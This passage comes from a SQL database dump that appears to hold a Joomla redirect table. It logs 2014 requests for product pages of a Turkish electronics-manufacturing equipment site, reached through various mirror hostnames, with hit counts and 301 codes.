00:00:00',301),(2303,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',6,0,'2014-08-11 01:28:50','0000-00-00 00:00:00',301),(2304,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',2,0,'2014-08-11 01:33:15','0000-00-00 00:00:00',301),(2305,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',8,0,'2014-08-11 01:46:50','0000-00-00 00:00:00',301),(2306,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',9,0,'2014-08-11 01:56:50','0000-00-00 00:00:00',301),(2307,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',3,0,'2014-08-11 01:59:32','0000-00-00 00:00:00',301),(2308,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',8,0,'2014-08-11 02:00:12','0000-00-00 00:00:00',301),(2309,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=tr','','','',1,0,'2014-08-11 02:18:24','0000-00-00 00:00:00',301),(2310,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',11,0,'2014-08-11 02:22:17','0000-00-00 00:00:00',301),(2311,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',3,0,'2014-08-11 02:25:45','0000-00-00 00:00:00',301),(2312,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',25,0,'2014-08-11 02:26:44','0000-00-00 00:00:00',301),(2313,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151','','','',2,0,'2014-08-11 02:28:19','0000-00-00 00:00:00',301),(2314,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',4,0,'2014-08-11 02:33:53','0000-00-00 00:00:00',301),(2315,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',8,0,'2014-08-11 02:40:19','0000-00-00 00:00:00',301),(2316,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',3,0,'2014-08-11 02:42:49','0000-00-00 00:00:00',301),(2317,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=en','','','',3,0,'2014-08-11 02:48:05','0000-00-00 00:00:00',301),(2318,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',5,0,'2014-08-11 02:49:06','0000-00-00 00:00:00',301),(2319,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',8,0,'2014-08-11 02:55:12','0000-00-00 00:00:00',301),(2320,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=en','','','',1,0,'2014-08-11 03:13:11','0000-00-00 00:00:00',301),(2321,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',1,0,'2014-08-11 03:13:36','0000-00-00 00:00:00',301),(2322,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',1,0,'2014-08-11 03:16:48','0000-00-00 00:00:00',301),(2323,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',6,0,'2014-08-11 03:25:12','0000-00-00 00:00:00',301),(2324,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',8,0,'2014-08-11 03:26:52','0000-00-00 00:00:00',301),(2325,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',3,0,'2014-08-11 03:27:35','0000-00-00 00:00:00',301),(2326,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',11,0,'2014-08-11 03:30:18','0000-00-00 00:00:00',301),(2327,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',12,0,'2014-08-11 03:50:31','0000-00-00 00:00:00',301),(2328,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',11,0,'2014-08-11 03:51:04','0000-00-00 00:00:00',301),(2329,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',29,0,'2014-08-11 03:51:25','0000-00-00 00:00:00',301),(2330,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=0&lang=en','','','',1,0,'2014-08-11 04:13:25','0000-00-00 00:00:00',301),(2331,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',2,0,'2014-08-11 04:26:37','0000-00-00 00:00:00',301),(2332,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',10,0,'2014-08-11 04:30:19','0000-00-00 00:00:00',301),(2333,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',3,0,'2014-08-11 04:42:35','0000-00-00 00:00:00',301),(2334,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',2,0,'2014-08-11 04:45:23','0000-00-00 00:00:00',301),(2335,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',6,0,'2014-08-11 04:47:06','0000-00-00 00:00:00',301),(2336,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',1,0,'2014-08-11 04:52:49','0000-00-00 00:00:00',301),(2337,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',2,0,'2014-08-11 04:55:41','0000-00-00 00:00:00',301),(2338,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',1,0,'2014-08-11 05:01:02','0000-00-00 00:00:00',301),(2339,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',9,0,'2014-08-11 05:11:17','0000-00-00 00:00:00',301),(2340,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',15,0,'2014-08-11 05:11:35','0000-00-00 00:00:00',301),(2341,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',3,0,'2014-08-11 05:12:44','0000-00-00 00:00:00',301),(2342,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',11,0,'2014-08-11 05:21:02','0000-00-00 00:00:00',301),(2343,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',6,0,'2014-08-11 05:45:12','0000-00-00 00:00:00',301),(2344,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-11 05:46:35','0000-00-00 00:00:00',301),(2345,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',3,0,'2014-08-11 06:21:39','0000-00-00 00:00:00',301),(2346,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',11,0,'2014-08-11 06:31:20','0000-00-00 00:00:00',301),(2347,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',6,0,'2014-08-11 07:06:26','0000-00-00 00:00:00',301),(2348,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',2,0,'2014-08-11 07:15:57','0000-00-00 00:00:00',301),(2349,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',6,0,'2014-08-11 07:40:13','0000-00-00 00:00:00',301),(2350,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',9,0,'2014-08-11 07:46:47','0000-00-00 00:00:00',301),(2351,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',2,0,'2014-08-11 07:50:12','0000-00-00 00:00:00',301),(2352,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',1,0,'2014-08-11 07:55:03','0000-00-00 00:00:00',301),(2353,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',6,0,'2014-08-11 08:04:05','0000-00-00 00:00:00',301),(2354,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',32,0,'2014-08-11 08:14:37','0000-00-00 00:00:00',301),(2355,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',4,0,'2014-08-11 08:45:46','0000-00-00 00:00:00',301),(2356,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',9,0,'2014-08-11 08:55:12','0000-00-00 00:00:00',301),(2357,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',1,0,'2014-08-11 08:55:13','0000-00-00 00:00:00',301),(2358,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',6,0,'2014-08-11 09:12:04','0000-00-00 00:00:00',301),(2359,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',5,0,'2014-08-11 09:15:18','0000-00-00 00:00:00',301),(2360,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','https://www.google.com.tr/','',1,0,'2014-08-11 09:23:18','0000-00-00 00:00:00',301),(2361,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',8,0,'2014-08-11 10:18:57','0000-00-00 00:00:00',301),(2362,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',4,0,'2014-08-11 10:21:15','0000-00-00 00:00:00',301),(2363,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',8,0,'2014-08-11 11:47:38','0000-00-00 00:00:00',301),(2364,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',1,0,'2014-08-11 12:01:44','0000-00-00 00:00:00',301),(2365,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',4,0,'2014-08-11 12:15:32','0000-00-00 00:00:00',301),(2366,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',6,0,'2014-08-11 12:29:47','0000-00-00 00:00:00',301),(2367,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',4,0,'2014-08-11 12:30:34','0000-00-00 00:00:00',301),(2368,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',4,0,'2014-08-11 12:39:50','0000-00-00 00:00:00',301),(2369,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',8,0,'2014-08-11 13:02:59','0000-00-00 00:00:00',301),(2370,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',11,0,'2014-08-11 13:17:45','0000-00-00 00:00:00',301),(2371,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',3,0,'2014-08-11 13:57:53','0000-00-00 00:00:00',301),(2372,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',1,0,'2014-08-11 14:14:36','0000-00-00 00:00:00',301),(2373,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',7,0,'2014-08-11 14:44:23','0000-00-00 00:00:00',301),(2374,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default','','','',6,0,'2014-08-11 14:49:30','0000-00-00 00:00:00',301),(2375,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',5,0,'2014-08-11 14:59:25','0000-00-00 00:00:00',301),(2376,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',8,0,'2014-08-11 15:18:25','0000-00-00 00:00:00',301),(2377,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',6,0,'2014-08-11 15:43:29','0000-00-00 00:00:00',301),(2378,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',8,0,'2014-08-11 18:11:05','0000-00-00 00:00:00',301),(2379,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',5,0,'2014-08-11 20:36:17','0000-00-00 00:00:00',301),(2380,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',5,0,'2014-08-11 20:52:43','0000-00-00 00:00:00',301),(2381,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',92,0,'2014-08-11 21:47:30','0000-00-00 00:00:00',301),(2382,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',7,0,'2014-08-11 21:52:59','0000-00-00 00:00:00',301),(2383,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=tr','','','',3,0,'2014-08-11 22:14:53','0000-00-00 00:00:00',301),(2384,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr','','','',7,0,'2014-08-11 22:42:17','0000-00-00 00:00:00',301),(2385,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',2,0,'2014-08-11 22:46:38','0000-00-00 00:00:00',301),(2386,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',6,0,'2014-08-11 23:04:13','0000-00-00 00:00:00',301),(2387,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',4,0,'2014-08-11 23:20:38','0000-00-00 00:00:00',301),(2388,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',7,0,'2014-08-11 23:31:35','0000-00-00 00:00:00',301),(2389,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',4,0,'2014-08-11 23:42:33','0000-00-00 00:00:00',301),(2390,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',5,0,'2014-08-11 23:48:01','0000-00-00 00:00:00',301),(2391,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',8,0,'2014-08-12 00:09:57','0000-00-00 00:00:00',301),(2392,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',5,0,'2014-08-12 00:20:54','0000-00-00 00:00:00',301),(2393,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',4,0,'2014-08-12 00:26:15','0000-00-00 00:00:00',301),(2394,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',1,0,'2014-08-12 01:00:51','0000-00-00 00:00:00',301),(2395,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',4,0,'2014-08-12 01:10:05','0000-00-00 00:00:00',301),(2396,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',6,0,'2014-08-12 01:15:33','0000-00-00 00:00:00',301),(2397,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',7,0,'2014-08-12 01:35:20','0000-00-00 00:00:00',301),(2398,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-12 01:36:19','0000-00-00 00:00:00',301),(2399,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-08-12 01:36:31','0000-00-00 00:00:00',301),(2400,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-12 01:45:33','0000-00-00 00:00:00',301),(2401,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',8,0,'2014-08-12 01:48:29','0000-00-00 00:00:00',301),(2402,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',3,0,'2014-08-12 01:49:21','0000-00-00 00:00:00',301),(2403,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',7,0,'2014-08-12 01:54:04','0000-00-00 00:00:00',301),(2404,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',10,0,'2014-08-12 02:01:37','0000-00-00 00:00:00',301),(2405,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',1,0,'2014-08-12 02:32:05','0000-00-00 00:00:00',301),(2406,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160','','','',1,0,'2014-08-12 03:38:14','0000-00-00 00:00:00',301),(2407,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',39,0,'2014-08-12 05:03:05','0000-00-00 00:00:00',301),(2408,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127','','','',3,0,'2014-08-12 05:06:57','0000-00-00 00:00:00',301),(2409,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',7,0,'2014-08-12 05:14:36','0000-00-00 00:00:00',301),(2410,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',3,0,'2014-08-12 05:38:09','0000-00-00 00:00:00',301),(2411,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',10,0,'2014-08-12 06:36:18','0000-00-00 00:00:00',301),(2412,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81','','','',1,0,'2014-08-12 06:50:38','0000-00-00 00:00:00',301),(2413,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',6,0,'2014-08-12 07:07:28','0000-00-00 00:00:00',301),(2414,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=tr','','','',5,0,'2014-08-12 07:07:31','0000-00-00 00:00:00',301),(2415,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',22,0,'2014-08-12 07:48:44','0000-00-00 00:00:00',301),(2416,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=en','','','',4,0,'2014-08-12 08:02:05','0000-00-00 00:00:00',301),(2417,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',7,0,'2014-08-12 08:09:22','0000-00-00 00:00:00',301),(2418,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',6,0,'2014-08-12 08:24:00','0000-00-00 00:00:00',301),(2419,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',2,0,'2014-08-12 08:52:49','0000-00-00 00:00:00',301),(2420,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',3,0,'2014-08-12 09:04:21','0000-00-00 00:00:00',301),(2421,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',3,0,'2014-08-12 09:04:59','0000-00-00 00:00:00',301),(2422,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',1,0,'2014-08-12 09:07:36','0000-00-00 00:00:00',301),(2423,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',3,0,'2014-08-12 09:13:24','0000-00-00 00:00:00',301),(2424,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',5,0,'2014-08-12 09:15:05','0000-00-00 00:00:00',301),(2425,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',6,0,'2014-08-12 09:17:04','0000-00-00 00:00:00',301),(2426,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',11,0,'2014-08-12 09:20:10','0000-00-00 00:00:00',301),(2427,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',3,0,'2014-08-12 09:36:58','0000-00-00 00:00:00',301),(2428,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',1,0,'2014-08-12 09:41:20','0000-00-00 00:00:00',301),(2429,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',8,0,'2014-08-12 09:44:20','0000-00-00 00:00:00',301),(2430,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=151&Itemid=152','','http://www.google.com.tr/imgres?imgurl=http%3A%2F%2Fproneo-led.com%2F3s-technologies.com.tr%2Fjoomla%2Fimages%2Furunler%2Fle-40v.gif&imgrefurl=http%3A','',1,0,'2014-08-12 09:58:33','0000-00-00 00:00:00',301),(2431,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',5,0,'2014-08-12 09:58:49','0000-00-00 00:00:00',301),(2432,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',3,0,'2014-08-12 10:00:50','0000-00-00 00:00:00',301),(2433,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',7,0,'2014-08-12 10:02:27','0000-00-00 00:00:00',301),(2434,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',1,0,'2014-08-12 10:17:46','0000-00-00 00:00:00',301),(2435,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',4,0,'2014-08-12 10:28:33','0000-00-00 00:00:00',301),(2436,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',4,0,'2014-08-12 10:40:52','0000-00-00 00:00:00',301),(2437,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',6,0,'2014-08-12 11:01:52','0000-00-00 00:00:00',301),(2438,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',4,0,'2014-08-12 11:19:05','0000-00-00 